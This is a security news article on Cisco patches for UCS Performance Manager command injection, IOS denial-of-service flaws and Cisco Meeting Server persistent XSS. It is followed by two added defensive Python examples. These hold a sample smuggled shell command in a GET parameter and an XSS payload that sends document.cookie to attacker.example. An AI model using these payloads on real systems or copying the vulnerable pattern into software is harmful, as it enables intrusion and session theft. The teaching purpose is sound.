Vulnerability in Cisco Unified Computing System (UCS) Performance Manager software could let an authenticated, remote attacker execute commands

Cisco has patched what it called a critical vulnerability in its Unified Computing System (UCS) Performance Manager software that could let an authenticated, remote attacker execute commands.

Cisco UCS Performance Manager versions 2.0.0 and prior are affected; the problem is resolved in Cisco UCS Performance Manager versions 2.0.1 and later. UCS Performance Manager collects information about UCS servers, network, storage and virtual machines.

According to Cisco, the vulnerability is due to insufficient input validation performed on parameters that are passed via an HTTP GET request. An attacker could exploit this vulnerability by sending crafted HTTP GET requests to an affected system. A successful exploit could allow the attacker to execute arbitrary commands with the privileges of the root user.

Cisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available, the company stated.

The patch comes on the heels of a series of security fixes recently offered by Cisco. Earlier this month the company released patches for vulnerabilities in its IOS software for networking devices and the Cisco and WebEx conferencing servers. According to an IDG News Service story, the most serious vulnerability affects the Cisco IOS XR software for the Cisco Network Convergence System (NCS) 6000 Series Routers. It can lead to a denial-of-service condition, leaving affected devices in a nonoperational state. Unauthenticated, remote attackers could exploit the vulnerability by initiating a number of management connections to an affected device over Secure Shell (SSH), Secure Copy Protocol (SCP) or Secure FTP (SFTP).
Because it could affect the availability of a critical piece of equipment, like a router, Cisco rated this vulnerability as high severity. There is no workaround and customers are advised to install the newly released patches.

Another flaw fixed in the Cisco IOS XR software could let attackers execute arbitrary commands on the operating system with root privileges. This vulnerability affects IOS XR Software Release 6.0.1.BASE and was rated medium severity because the attacker needs to be authenticated as a local user.

A denial-of-service vulnerability was also fixed in Cisco IOS Software. It can be used to crash devices running affected versions of the software by sending specially crafted Link Layer Discovery Protocol (LLDP) packets to them. Exploitation doesn't require authentication, but it does require the attacker to be in a position to send LLDP packets to the device; since LLDP is a link-local protocol that is not routed, that means being on an adjacent network segment.

Cisco's meeting servers were also patched, according to the IDG report. One vulnerability in the HTTP interface of the Cisco Meeting Server, formerly Acano Conferencing Server, could have allowed attackers to launch persistent cross-site scripting (XSS) attacks against users of the interface. Attackers could exploit this flaw by tricking users into clicking maliciously crafted links, and could then execute rogue JavaScript code in the victims' browsers in the context of the Cisco Meeting Server interface. This could be used to steal authentication cookies or to force the users' browsers to perform unauthorized actions on their behalf.

Information from the IDG News Service was used in this article.
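The UCS Performance Manager bug above is described only as "insufficient input validation on parameters passed via an HTTP GET request" leading to root command execution. The following is an added example, written for this page and not code from Cisco or from UCS Performance Manager, of what that bug class typically looks like in a web diagnostic handler and how it is closed: the `host` parameter name, the `ping` diagnostic and the `/diag/ping` path are assumptions. The vulnerable builder pastes the decoded parameter into a shell command line; the hardened builder allowlists the value and passes it as a single argv element so no shell ever parses it.

```python
"""Command injection through an HTTP GET parameter, the bug class described above.

Hypothetical example written for this page, not code from Cisco or from
UCS Performance Manager: the `host` parameter, the ping diagnostic and the
URL paths are assumptions used to illustrate the pattern."""
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Allowlist for the parameter: DNS-style labels or a dotted-quad address, nothing else.
HOST_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(r"(?:%s\.)*%s" % (HOST_LABEL, HOST_LABEL))


def is_valid_host(value):
    """True only for a syntactically plausible hostname or IPv4 literal of sane length."""
    return 0 < len(value) <= 253 and HOST_RE.fullmatch(value) is not None


def host_param(url):
    """Pull exactly one `host` value out of the query string (values are URL-decoded)."""
    values = parse_qs(urlsplit(url).query).get("host", [])
    if len(values) != 1:
        raise ValueError("exactly one host parameter is required")
    return values[0]


def vulnerable_command(url):
    """Insufficient input validation: the decoded parameter is pasted into a
    command line that will be handed to /bin/sh, so ';', '|', '`' and '$()' in
    the request become extra commands. If the service runs as root, so do they."""
    return "ping -c 1 " + host_param(url)


def hardened_command(url):
    """Validate against the allowlist and build an argv list; no shell is involved,
    so metacharacters cannot change what is executed even if validation were weaker."""
    host = host_param(url)
    if not is_valid_host(host):
        raise ValueError("rejected host parameter: %r" % (host,))
    return ["ping", "-c", "1", host]


def run_vulnerable(url):
    # shell=True is what turns the string above into an injection sink.
    return subprocess.run(vulnerable_command(url), shell=True, capture_output=True, text=True)


def run_hardened(url):
    # Argument list with shell=False (the default): the host is one argv element.
    return subprocess.run(hardened_command(url), capture_output=True, text=True)


if __name__ == "__main__":
    benign = "/diag/ping?host=10.0.0.1"
    # Constructed request: ';' URL-encoded as %3B so parse_qs hands back "10.0.0.1;id".
    attack = "/diag/ping?host=10.0.0.1%3Bid"
    print("vulnerable would run:", vulnerable_command(attack))
    try:
        hardened_command(attack)
    except ValueError as exc:
        print("hardened:", exc)
    print("hardened would run:", hardened_command(benign))
```

The `__main__` section only prints the command each variant would execute; `run_vulnerable` and `run_hardened` are there to show the `shell=True` versus argv-list dispatch and actually invoke `ping` if called. The allowlist is the primary control; dropping the shell is the defence that still holds if the allowlist is ever loosened.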
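For the Cisco Meeting Server item, the article describes the outcome of persistent XSS (attacker-supplied JavaScript running in the interface's origin, cookie theft) but not the rendering mistake behind it. The following is an added example written for this page, not code from Cisco or Acano: the stored display name, the HTML fragment and the cookie attributes are assumptions. It contrasts raw interpolation, the common half-fix of stripping angle brackets (which still lets an attribute-context payload add an event handler), and context-aware escaping, and shows the cookie flags that blunt the cookie-theft outcome even when some script does run.

```python
"""Persistent XSS in a web interface, the bug class in the Cisco Meeting Server item above.

Hypothetical example written for this page, not code from Cisco or Acano: the stored
display name, the HTML fragment and the cookie attributes are assumptions."""
import html

# Constructed payloads an attacker might store (e.g. as a display name) so that they
# are later rendered to every user who views the page.
TEXT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = 'x" onmouseover="alert(document.cookie)'


def render_vulnerable(display_name):
    """Raw interpolation into both an attribute and a text node: whatever was stored
    becomes markup in the viewer's browser."""
    return '<span title="%s">%s</span>' % (display_name, display_name)


def render_naive(display_name):
    """A common half-fix: strip angle brackets. Stops <script> in text context but not
    the attribute payload, which needs no '<' at all to add an event handler."""
    stripped = display_name.replace("<", "").replace(">", "")
    return '<span title="%s">%s</span>' % (stripped, stripped)


def render_hardened(display_name):
    """Context-aware escaping: html.escape(quote=True) neutralises <, >, &, " and '
    so the value is inert in text and in quoted-attribute context alike."""
    safe = html.escape(display_name, quote=True)
    return '<span title="%s">%s</span>' % (safe, safe)


def session_cookie_header(token):
    """Defence in depth for the cookie-theft outcome: HttpOnly keeps the session
    cookie out of document.cookie, Secure keeps it off plaintext HTTP, SameSite
    limits cross-site requests that would carry it."""
    return "session=%s; Path=/; Secure; HttpOnly; SameSite=Strict" % token


def injects_handler(rendered_html):
    """Crude check used here only to show the difference between the renderers:
    does the markup contain an inline event handler preceded by a real, unescaped quote?"""
    return '" onmouseover="' in rendered_html


if __name__ == "__main__":
    renderers = (("vulnerable", render_vulnerable), ("naive", render_naive), ("hardened", render_hardened))
    for name, render in renderers:
        print(name, "script tag:", "<script>" in render(TEXT_PAYLOAD),
              "handler:", injects_handler(render(ATTR_PAYLOAD)))
    print(session_cookie_header("0123abcd"))
```

Escaping must match the context the value lands in; `html.escape` with `quote=True` covers text and quoted attributes, but a value placed inside a `<script>` block or a URL needs its own encoding, and an unquoted attribute is unsafe regardless of escaping. The cookie flags do not prevent the injection, only the direct `document.cookie` read.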